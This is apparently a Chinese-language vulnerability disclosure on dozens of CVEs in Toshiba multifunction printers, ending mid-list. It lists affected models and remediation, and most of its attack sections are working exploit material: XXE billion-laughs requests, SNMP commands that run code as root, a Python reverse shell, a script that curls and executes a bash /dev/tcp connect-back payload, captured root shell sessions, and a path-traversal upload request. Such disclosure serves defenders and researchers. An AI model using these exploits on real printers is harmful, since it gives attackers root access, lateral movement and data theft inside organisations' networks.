漏洞摘要
易受攻击的版本:103 种不同型号的东芝多功能打印机 (MFP) 易受攻击。建议访问东芝官方公告,查看受影响打印机列表并应用安全补丁并更换不受支持的 MFP 型号。
该漏洞概述如下:
-
CVE-2024-27141 – 预认证盲 XML 外部实体 (XXE) 注入 – DoS
-
CVE-2024-27142——预认证 XXE 注入
-
CVE-2024-27143 – 以 root 身份进行预认证远程代码执行
-
CVE-2024-27144 – 以 root 或 apache 身份进行预认证的远程代码执行以及多个本地权限提升
4.1.远程代码执行 – 在 WSGI Python 程序中上传新的 .py 模块
4.2.远程代码执行 – 在 WSGI Python 程序中上传新的 .ini 配置文件
4.3.远程代码执行 – 上传恶意脚本/tmp/backtraceScript.sh并注入恶意 gdb 命令
4.4.远程代码执行 – 上传恶意/home/SYSROM_SRC/build/common/bin/sapphost.py程序
4.5.远程代码执行 – 上传恶意库
4.6.获取远程代码执行的其他方式 -
CVE-2024-27145 – 以 root 身份多次执行经过身份验证的远程代码执行
-
CVE-2024-27146——缺乏权限分离
-
CVE-2024-27147 – 使用 snmpd 进行本地权限提升和远程代码执行
-
CVE-2024-27148 – 使用不安全的 PATH 进行本地权限提升和远程代码执行
-
CVE-2024-27149 – 使用不安全的 LD_PRELOAD 进行本地权限提升和远程代码执行
-
CVE-2024-27150 – 使用不安全的 LD_LIBRARY_PATH 进行本地权限提升和远程代码执行
-
CVE-2024-27151 – 使用不安全权限对 106 个程序进行本地特权升级和远程代码执行
11.1.3个未以 root 身份运行的易受攻击的程序
11.2.103个以 root 身份运行的易受攻击的程序 -
CVE-2024-27152 – 使用不安全的库权限进行本地特权升级和远程代码执行
12.1.示例/home/SYSROM_SRC/bin/syscallerr -
CVE-2024-27153 – 利用 CISSM 进行本地权限提升和远程代码执行
-
CVE-2024-27154 和 CVE-2024-27155 – 密码存储在明文日志和不安全的日志中
14.1.用户登录打印机时,明文密码写入日志中
14.2.修改密码时,明文密码写入日志中 -
CVE-2024-27156 – /ramdisk/work/log 目录中不安全日志中的身份验证会话泄露
-
CVE-2024-27157 – /ramdisk/al/network/log 目录中不安全日志中的身份验证会话泄露
-
CVE-2024-27158 – 硬编码 root 密码
-
CVE-2024-27159 – 用于加密日志的硬编码密码
-
CVE-2024-27160 – 用于加密日志的硬编码密码和使用弱摘要密码
-
CVE-2024-27161 – 用于加密文件的硬编码密码
-
CVE-2024-27162 – /js/TopAccessUtil.js 文件中存在基于 DOM 的 XSS
-
CVE-2024-27163 – 管理员密码和密码泄露
-
CVE-2024-27164 – telnetd 中的硬编码凭证
-
CVE-2024-27165 – 使用 PROCSUID 进行本地权限提升
-
CVE-2024-27166 – 核心文件的不安全权限
-
CVE-2024-27167 – Sendmail 使用的不安全权限 – 本地权限提升
-
CVE-2024-27168 – 在 Python 应用程序中发现用于生成身份验证 cookie 的硬编码密钥
-
CVE-2024-27169 – WebPanel 中缺乏身份验证 – 本地权限提升
-
CVE-2024-27170 – WebDAV 访问的硬编码凭据
-
CVE-2024-27171——不安全的权限
-
CVE-2024-27172 – 远程代码执行 – 以 root 身份进行命令注入
-
CVE-2024-27173 – 远程代码执行 – 不安全上传
-
CVE-2024-27174 – 远程代码执行 – 不安全上传
-
CVE-2024-27175 – 本地文件包含
-
CVE-2024-27176 – 远程代码执行 – 不安全上传
-
CVE-2024-27177 – 远程代码执行 – 不安全上传
-
CVE-2024-27178 – 远程代码执行 – 不安全复制
-
CVE-2024-27179 – 应用程序安装中的日志文件内存在会话泄露
-
CVE-2024-27180 – 应用程序安装中的 TOCTOU 漏洞,允许安装恶意应用程序并获取 RCE
CVE-2024-27171 至 CVE-2024-27180 影响东芝打印机中默认安装的第三方应用系统和第三方应用程序的实现——这是一个极其有趣的持久性攻击面。
TL;DR:攻击者可以利用多个漏洞危害东芝多功能打印机。
东芝多功能打印机存在漏洞的型号列表(103个型号):
2021AC, 2521AC, 2020AC, 2520AC, 2025NC, 2525AC, 3025AC, 3525AC, 3525ACG, 4525AC, 4525ACG, 5525AC, 5525ACG,
6525AC, 6525ACG, 2528A, 3028A, 3528A, 3528AG, 4528A, 4528AG, 5528A, 6528A, 6526AC, 6527AC, 7527AC, 6529A,
7529A, 9029A, 330AC, 400AC, 2010AC, 2110AC, 2510AC, 2610AC, 2015NC, 2515AC, 2615AC, 3015AC, 3115AC, 3515AC,
3615AC, 4515AC, 4615AC, 5015AC, 5115AC, 2018A, 2518A, 2618A, 3018A, 3118A, 3018AG, 3518A, 3518AG, 3618A,
3618AG, 4518A, 4518AG, 4618A, 4618AG, 5018A, 5118A, 5516AC, 5616AC, 6516AC, 6616AC, 7516AC, 7616AC, 5518A,
5618A, 6518A, 6618A, 7518A, 7618A, 8518A, 8618A, 2000AC, 2500AC, 2005NC, 2505AC, 3005AC, 3505AC, 4505AC,
5005AC, 2008A, 2508A, 3008A, 3008AG, 3508A, 3508AG, 4508A, 4508AG, 5008A, 5506AC, 6506AC, 7506AC, 5508A,
6508A, 7508A, 8508A, 3508LP, 4508LP, 5008LP.其他说明:
此次安全评估完全采用黑盒方法,完全远程进行 – 我只拥有一些打印机的 IP(没有物理访问权限,也没有管理员或普通用户的凭证)。因此,没有分析打印机的物理安全性,而是使用运行最新固件版本的不同型号(e-STUDIO2010AC、e-STUDIO3005AC、e-STUDIO3508A 和 e-STUDIO5018A)确认了漏洞。
该漏洞已于 2023 年 6 月 14 日告知东芝,与东芝的沟通非常有效。
影响
攻击者可以入侵东芝多功能打印机 (MFP) 并执行代码。这些打印机运行 Linux,功能强大。它们非常适合托管植入程序(以及 Bettercap 等有趣的程序)并在基础设施内部横向移动。
建议
-
使用网络分段来隔离 MFP。
-
应用安全补丁。
-
更换不受支持的 MFP。
详细信息 – 预认证盲 XML 外部实体 (XXE) 注入 – DoS
东芝打印机使用 XML 通信作为/contentwebserver打印机提供的 API 端点。
此端点由位于库内的 Apache 模块管理mod_contentwebserver.so。此库提供 XML 解析,并且容易受到基于时间的盲 XML 外部实体 (XXE) 漏洞的攻击。
使用 Billion-laugh 攻击,我们可以确认存在基于时间的盲 XXE 漏洞。当仅发送 lolz 根元素内定义的 1 个实体 (&lol1) 时,此 &lol1 实体将扩展为 10 个实体,请求耗时 200ms。
实体正在扩展至:
-
10^10个实体,请求耗时206ms;
-
10^10^10个实体,请求耗时541ms;
-
10^10^10^10个实体,请求耗时2.7s;
-
10^10^10^10^2个实体,请求耗时8.8s;
-
10^10^10^10^2个实体,请求耗时30.9s;
即使 Apache 服务器显示MODULE_ERROR:SendRequest failed,也表明 XML 已由mod_contentwebserver.so远程打印机中运行的库成功评估。
有效载荷为:
POST /contentwebserver HTTP/1.1
Host: 10.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
csrfpId: 10.0.0.2.852d519a6fa9825fae857bac5c003da0
Content-Length: 759
Origin: http://10.0.0.1:8080
Connection: close
Referer: http://10.0.0.1:8080/?MAIN=TOPACCESS
Cookie: Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0; Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DLOGS; IgnoreSessionTimeout=1
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol5;</lolz>在 Burp 内部使用此 HTTP 请求(在无需身份验证的情况下浏览打印机时具有正确的会话),我们可以修改最后一行的实体;通过比较打印机分析请求所需的时间,我们可以看到 XML 已被解析。
时间将显示在 Burp 窗口的右下角(以下屏幕截图中为红色):
如果有 10^10^10^10^4 个实体,则请求需要 30 秒。
包含更多 XML 复杂性(需要解析大量 XML 实体)的 HTTP 请求将对打印机造成 DoS 攻击,并且打印机的 CPU 将以 100% 运行。
XML解析器存在XXE漏洞,无需身份验证。
由于 XML 解析器中似乎实现了一些保护措施,因此无法通过 HTTP、FTP 和 gopher 进行文件泄露。
详细信息 – 预认证 XXE 注入
东芝打印机使用 XML 通信作为/contentwebserver打印机提供的 API 端点。
此端点由位于mod_contentwebserver.so库内的 Apache 模块管理。此库提供 XML 解析,并且容易受到 XML 外部实体 (XXE) 漏洞的攻击。
使用 Billion-laugh 攻击和正确格式化的打印机数据(使用东芝特定的非公开 DTD,标签将被远程打印机解释),我们可以确认存在 XXE 漏洞。打印机将显示生成的评估 XML:
恶意负载为(包含<X>&lol4;</X>):
POST /contentwebserver HTTP/1.1
Host: 10.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
csrfpId: 10.0.0.2.5d5255447c6eb69fc84a2d8c2056eb7d
Content-Length: 1226
Origin: http://10.0.0.1:8080
Connection: close
Referer: http://10.0.0.1:8080/Administration/CreateNewPwd.html
Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DDEVICE; IgnoreSessionTimeout=1; clicked=0; addrLastVisited=ADDRBK; Session=10.0.0.2.5d5255447c6eb69fc84a2d8c2056eb7d; PREF=%7BList%2C8%2CClip
boardForPage-%7D; PROGSTAT=0
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<?xml version="1.0"?>
<DeviceInformationModel>
<GetValue>
<UserManager>
<View>
<Users/>
</View>
</UserManager>
</GetValue>
<SetValue>
<UserManager>
<View>
<Users>
<User>
<Information>
<X>&lol4;</X>
</Information>
</User>
</Users>
</View>
</UserManager>
</SetValue>
<Command>
<ForgotPassword>
<commandNode>UserManager/Users</commandNode>
<Params>
<userDetails contentType="XPath">UserManager/View/Users/User</userDetails>
<cmdDetails commandType="Reset"/>
</Params>
</ForgotPassword>
</Command>
</DeviceInformationModel>HTTP/1.1 200 OK
Date: Wed, 27 May 2023 10:54:12 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=63072000
Accept-Language: en-US,en;q=0.5
Connection: close
Content-Type: text/xml
Content-Length: 30465
<?xml version="1.0"?>
<DeviceInformationModel>
<GetValue>
<UserManager>
<View>
<Users>
<User>
<Information>
<X>lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol[...]lollollollollol</X>
</Information>
</User>
</Users>
</View>
</UserManager>
</GetValue>
<Command>
<ForgotPassword>
<commandNode>UserManager/Users</commandNode>
<Params>
<userDetails contentType="XPath">UserManager/View/Users/User</userDetails>
<cmdDetails commandType="Reset"/>
</Params>
<Response>
<statusOfOperation>STATUS_FAILED</statusOfOperation>
</Response>
</ForgotPassword>
</Command>
</DeviceInformationModel>
kali%XML解析器存在XXE漏洞,无需身份验证。
攻击者可以利用 XXE 来检索信息。
由于同时发现了 RCE:以 root 身份预先认证的远程代码执行,因此没有深入分析可利用性。
详细信息 – 以 root 身份进行预认证远程代码执行
观察发现东芝打印机使用 SNMP 进行配置。
默认情况下,使用这些社区:
-
public用于只读访问; -
private用于读/写访问。
使用private社区,可以在远程打印机上以 root 身份远程执行命令。
例如,这些命令将id在远程打印机上以 root 身份执行命令:
kali% snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private [ip] 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c id'
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: createAndGo(4)
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c id
kali% snmpbulkwalk -c private -v2c [ip] NET-SNMP-EXTEND-MIB::nsExtendObjects
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 6
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c id
NET-SNMP-EXTEND-MIB::nsExtendInput."cmd" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."cmd" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."cmd" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."cmd" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."cmd" = INTEGER: volatile(2)
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."cmd" = STRING: uid=0(root) gid=2000(trusted) groups=0(root)
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."cmd" = STRING: uid=0(root) gid=2000(trusted) groups=0(root)
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."cmd" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendResult."cmd" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."cmd".1 = STRING: uid=0(root) gid=2000(trusted) groups=0(root)利用此漏洞将允许任何攻击者获得远程东芝打印机的 root 访问权限,如下所示。
以下 PoC 将以 root 权限执行到 10.0.0.2:21/tcp 的连接 shell:
kali% snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private [ip] 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /home/SYSROM_SRC/build/release/bin/python 'nsExtendArgs."cmd"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect(("10.0.0.2",21));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")"'
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: createAndGo(4)
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /home/SYSROM_SRC/build/release/bin/python
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c "import sys,socket,os,pty;s=socket.socket();s.connect(("10.0.0.2",21));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")"
kali% snmpbulkwalk -c private -v2c [ip] NET-SNMP-EXTEND-MIB::nsExtendObjects在攻击者的机器上,我们将在端口 21/tcp 上收到一个 shell:
kali# nc -l -v -p 21
listening on [any] 21 ...
10.0.0.1: inverse host lookup failed: Unknown host
connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 43467
sh-4.1# uname -ap
Linux MFP12188257 3.10.38-ltsi-WR6.0.0.11_standard #3010 SMP Wed Jul 6 16:20:23 IST 2022 i686 GNU/Linux
sh-4.1# id
uid=0(root) gid=2000(trusted) groups=0(root)
sh-4.1# exit然后攻击者将获得打印机的完全 root 访问权限,包括对加密分区的完全访问权限:
kali# nc -l -v -p 443
listening on [any] 443 ...
10.0.0.1: inverse host lookup failed: Unknown host
connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 36468
bash-4.1# df -h
df -h
Filesystem Size Used Avail Use% Mounted on
rootfs 4.8G 3.7G 904M 81% /
/dev/root 48M 28M 18M 62% /old_root
/dev/sda2 4.8G 3.7G 904M 81% /
/dev/sda13 4.8G 49M 4.5G 2% /platform
none 1.5G 188K 1.5G 1% /dev
/dev/sda3 4.8G 1.3G 3.4G 28% /rollback
/dev/sda5 25G 904M 23G 4% /work
/dev/sda6 2.9G 620M 2.2G 23% /registration
/dev/sda7 976M 1.3M 908M 1% /backup
/dev/sda8 32G 60M 30G 1% /imagedata
/dev/sda9 94G 65M 89G 1% /application
/dev/mapper/enc_encryption
992M 2.6M 964M 1% /encryption
/dev/sda12 119G 60M 112G 1% /storage
tmpfs 1.5G 3.7M 1.5G 1% /dev/shm
bash-4.1# mount
mount
rootfs on / type rootfs (rw)
/dev/root on /old_root type ext2 (rw,relatime,errors=continue,user_xattr)
proc on /old_root/proc type proc (rw,relatime)
/dev/sda2 on / type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
/dev/sda13 on /platform type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
proc on /proc type proc (rw,relatime)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
none on /dev type tmpfs (rw,relatime,mode=755)
ramfs on /ramdisk type ramfs (rw,relatime,size=100m)
/dev/sda3 on /rollback type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
/dev/sda5 on /work type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
/dev/sda6 on /registration type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
/dev/sda7 on /backup type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
/dev/sda8 on /imagedata type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
/dev/sda9 on /application type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
/dev/mapper/enc_encryption on /encryption type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
/dev/sda12 on /storage type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
tmpfs on /dev/shm type tmpfs (rw,relatime,mode=755)
devpts on /dev/pts type devpts (rw,relatime,mode=600)
fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime)
bash-4.1#该漏洞位于 net-snmpd 内部,因为 net-snmpd 支持NET-SNMP-EXTEND-MIB扩展 MIB。
此扩展允许以 root 权限执行 net-snmpd 守护进程的代码,分为 2 个步骤:
-
新的 MIB 的定义;
-
执行新的 MIB。
还提供了 bash 有效载荷:
以下 PoC 将下载一个 shell 脚本,将其保存在里面/dev/shm/pwn.sh并在目标打印机上以 root 身份执行它:
kali% cat /var/www/html/pwn.sh
#!/bin/sh
bash -i >& /dev/tcp/10.0.0.2/443 0>&1
kali% cat ./remote-pwn.sh
#!/bin/sh
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "curl http://10.0.0.2/pwn.sh -o /dev/shm/pwn.sh"'
snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod 755 /dev/shm/pwn.sh"'
snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = ' "/dev/shm/pwn.sh"'
snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects使用此 PoC 获取回连 root shell:
kali% ./remote-pwn.sh 10.0.0.1
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: createAndGo(4)
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c "curl http://10.0.0.2/pwn.sh -o /dev/shm/pwn.sh"
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 21
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c "curl http://10.0.0.2/pwn.sh -o /dev/shm/pwn.sh"
NET-SNMP-EXTEND-MIB::nsExtendInput."cmd" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."cmd" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."cmd" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."cmd" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."cmd" = INTEGER: volatile(2)
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."cmd" = STRING: % Total % Received % Xferd Average Speed Time Time Time Current
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."cmd" = STRING: % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 53 100 53 0 0 53 0 0:00:01 --:--:-- 0:00:01 114
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."cmd" = INTEGER: 3
NET-SNMP-EXTEND-MIB::nsExtendResult."cmd" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."cmd".1 = STRING: % Total % Received % Xferd Average Speed Time Time Time Current
NET-SNMP-EXTEND-MIB::nsExtendOutLine."cmd".2 = STRING: Dload Upload Total Spent Left Speed
100 53 100 53 0 0 53 0 0:00:01 --:--:-- 0:00:01 114
Error in packet.
Reason: inconsistentValue (The set value is illegal or unsupported in some way)
Failed object: NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd"
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 21
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: createAndGo(4)
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: "/dev/shm/pwn.sh"
caTimeout: No Response from 10.0.0.1并且 connect-back shell 脚本将连接到 10.0.0.2 的端口 443/tcp,如上面的pwn.sh脚本所定义:
kali# nc -l -v -p 443
listening on [any] 443 ...
10.0.0.1: inverse host lookup failed: Unknown host
connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 36464
bash-4.1# uname -ap
Linux MFP14144292 3.10.38-ltsi-WR6.0.0.11_standard #3513 SMP Tue Jul 5 09:58:22 IST 2022 i686 GNU/Linux
bash-4.1# id
uid=0(root) gid=2000(trusted) groups=0(root)
bash-4.1#/encryption/al/network/config/snmpd.conf,其中包含默认社区:bash-4.1# grep -v '^#' /encryption/al/network/config/snmpd.conf
rocommunity public
rocommunity6 public
rwcommunity private
rwcommunity6 private
com2sec udp 0.0.0.0/24 public
view all included .1 80
view generaluser_view excluded .1
view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.23.2.1.3
view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.21.4.1.3
view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.21.4.1.4
access udpGroup "toshibaAmerica" v1 noauth exact all all none
access admin_priv_group "" usm priv prefix all all none
access admin_auth_group "" usm auth prefix all all none
access generaluser_priv_group "" usm priv prefix all generaluser_view none
access generaluser_auth_group "" usm auth prefix all generaluser_view none
trapcommunity public
dlmod mibs_impl /home/SYSROM_SRC/lib/libalmibs_impl.so
master off
agentaddress udp:161,udp6:161
authtrapenable 1
maxGetbulkRepeats 20
maxGetbulkResponses 100bash-4.1#SNMP 也通过 IPv6 公开。
详细信息 – 以 root 或 apache 身份进行预认证远程代码执行以及多次本地权限提升
东芝打印机提供了几种使用网络界面上传文件的方法。
默认情况下,此 Web 界面无需身份验证即可访问。
例如,使用电子归档网页界面(可通过 http://ip:8080/?MAIN=EFILING 自由访问),我们可以上传文档:
可以上传文件:
上传的文件将存储在打印机内部的 /work/al/tmp/upload/ 目录中,该目录位于当前会话命名的目录内。
bash-4.1# find /work/al/tmp/upload
/work/al/tmp/upload
/work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab
/work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab/test3.txt
/work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab/test1.txt
/work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab/test2.txt
bash-4.1# ls -latrR /work/al/tmp/upload
/work/al/tmp/upload:
total 12
drwxr-xr-x 7 root lp 4096 Mar 24 05:35 ..
drwx------ 2 apache trusted 4096 Mar 24 05:43 ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab
drwxrwxrwx 3 root trusted 4096 Mar 24 05:46 .
/work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab:
total 20
-rw-rw-rw- 1 apache trusted 8 Mar 24 05:41 test1.txt
-rw-rw-rw- 1 apache trusted 9 Mar 24 05:42 test2.txt
-rw-rw-rw- 1 apache trusted 9 Mar 24 05:43 test3.txt
drwx------ 2 apache trusted 4096 Mar 24 05:43 .
drwxrwxrwx 3 root trusted 4096 Mar 24 05:46 ..
bash-4.1#此当前会话由打印机在无需身份验证访问 Web 界面时提供。
攻击者可以在未经身份验证的情况下,利用浏览 http://ip/?MAIN=EFILING 时获得的有效会话重放 HTTP 请求,并更改上传文件的路径。然后,此路径将用于将文件存储在远程打印机内。
例如,将Name变量设置为/./../../../../../home/SYSROM_SRC/sbin/malicious.program,上传的文件就可以正确写入/home/SYSRM_SRC/sbin/malicious.program打印机内部。
HTTP 请求将是:
POST /contentwebserver/upload HTTP/1.1
Host: 10.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------12552735029913057752829397207
Content-Length: 1011
Origin: http://10.0.0.1:8080
Connection: close
Referer: http://10.0.0.1:8080/efiling/UploadArchive.html?v=1517352288ta
Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DDEVICE; Session=10.0.0.2.c8a776a2c87613d78cbb94c558269c61; IgnoreSessionTimeout=3
Upgrade-Insecure-Requests: 1
-----------------------------12552735029913057752829397207
Content-Disposition: form-data; name="formSubmitCompleteEventHandler"
frames[1].formSubmitComplete
-----------------------------12552735029913057752829397207
Content-Disposition: form-data; name="DeviceInformationModel"
<DeviceInformationModel><Command><Move><commandNode>FileStorages</commandNode><Params><source><File>test.txt</File><name>Upload</name></source><destination><name>DataImport</name></destination></Params></Move></Command></DeviceInformationModel>
-----------------------------12552735029913057752829397207
Content-Disposition: form-data; name="CsrfpId"
10.0.0.2.c8a776a2c87613d78cbb94c558269c61
-----------------------------12552735029913057752829397207
Content-Disposition: form-data; name="/./../../../../../home/SYSROM_SRC/sbin/malicious.program"; filename="test.txt"
Content-Type: text/plain
MALICIOUS_CONTENT_WRITTEN_INTO_THE_HARD_DISK
-----------------------------12552735029913057752829397207--Burp 请求:
并且文件正确写入/home/SYSRM_SRC/sbin/malicious.program打印机内部:
此漏洞可通过多种不同方式用于远程代码执行。由于东芝打印机中存在一些漏洞,因此有数百种不同的方法可以实现远程代码执行。例如:
-
上传LD_PRELOAD变量中定义的恶意库:
-
/ramdisk/al/libGetNameInfoInterface.so 或 /ramdisk/al/libGetAddtInfoInterface.so 可能被恶意库覆盖
-
使用 LD_LIBRARY_PATH 变量上传恶意库 – 攻击者可以在以下位置上传恶意库:
-
/home/SYSROM_SRC/build/release/lib,
-
/mfp/lib,
-
/主页/SYSROM_SRC/NoBuildItems/common/lib,
-
/home/SYSROM_SRC/build/thirdparty/plugins/platforminputcontexts/,
-
/home/SYSROM_SRC/build/release/lib。
-
由于不安全的权限而上传恶意程序:
-
